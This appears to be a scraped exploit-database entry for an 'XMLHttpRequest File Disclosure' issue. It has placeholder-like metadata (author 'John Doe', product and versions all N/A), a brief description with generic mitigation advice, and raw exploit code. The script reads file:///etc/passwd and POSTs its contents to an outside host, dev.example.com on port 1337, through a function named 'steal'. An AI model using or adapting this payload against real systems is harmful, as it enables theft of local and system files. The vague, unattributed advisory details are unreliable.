header-logo
Suggest Exploit
vendor:
N/A
by:
John Doe
8.8
CVSS
HIGH
XMLHttpRequest File Disclosure
200
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

XMLHttpRequest File Disclosure Vulnerability

This vulnerability allows an attacker to read sensitive files on the server by using XMLHttpRequest to send a GET request to the file. The attacker can then use the XMLHttpRequest to send the file contents to a remote server, allowing the attacker to steal the file contents.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not allowing requests to sensitive files. Additionally, the application should be configured to only allow requests from trusted sources.
Source

Exploit-DB raw data:

<body>
<script>
var file = "file:///etc/passwd";
var extract = "http://dev.example.com:1337/";
function get(url) {
 var xmlHttp = new XMLHttpRequest();
 xmlHttp.open("GET", url, false);
 xmlHttp.send(null);
 return xmlHttp.responseText;
}
function steal(data) {
 var xhr = new XMLHttpRequest();
 xhr.open('POST', extract, true);
 xhr.onload = function() {};
 xhr.send(data);
}
var cdl = get(file);
steal(cdl);
</script>
</body>

Navigation

Suggest Exploit

Services By CQR